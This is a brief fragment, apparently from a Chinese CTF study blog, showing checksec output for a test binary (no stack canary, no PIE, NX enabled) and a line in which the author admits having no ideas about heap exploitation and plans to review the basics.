1 2 3 4 5 6 7 8 bbq@ubuntu:~/tools/LibcSearcher$ checksec 1111 [*] '/home/bbq/tools/LibcSearcher/1111' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~/tools/LibcSearcher$
堆这块是一点思路没有,准备在看看前置知识